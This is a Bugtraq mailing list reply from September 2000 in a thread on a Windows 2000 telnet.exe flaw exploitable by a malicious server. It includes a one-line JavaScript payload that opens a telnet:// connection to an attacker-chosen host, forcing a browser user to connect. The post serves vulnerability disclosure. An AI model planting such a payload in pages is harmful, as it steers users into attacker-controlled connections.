Bugtraq mailing list archives

Re: Win2k Telnet.exe malicious server vulnerability

From: Tim Hollebeek <tim () RSTCORP COM>
Date: Thu, 14 Sep 2000 11:18:21 -0400

During my tests I discovered that IE associates the telnet://
URL with the vulnerable telnet.exe. This opens up several
possible ways to force a user into connecting to you with a
malicious HTLM web page, email message, and so on. I would
speculate that it might also be possible to force this to
happen without user intervention with javascript/activeX/java
or really creative HTLM.


In fact it's trivial to do so.  Use:
<script>window.open("telnet://some.host.here")</script>

Current thread:

Win2k Telnet.exe malicious server vulnerability monti (Sep 13)
- Re: Win2k Telnet.exe malicious server vulnerability Jim Paris (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Micah Webner (Sep 14)
- <Possible follow-ups>
- Re: Win2k Telnet.exe malicious server vulnerability Microsoft Security Response Center (Sep 14)
  - Re: Win2k Telnet.exe malicious server vulnerability monti (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Microsoft Security Response Center (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Tim Hollebeek (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Blue Boar (Sep 15)
- Re: Win2k Telnet.exe malicious server vulnerability Рягин Михаил Юрьевич (Sep 15)
  - Re: Win2k Telnet.exe malicious server vulnerability Bronek Kozicki (Sep 17)
    - Re: Win2k Telnet.exe malicious server vulnerability J Edgar Hoover (Sep 18)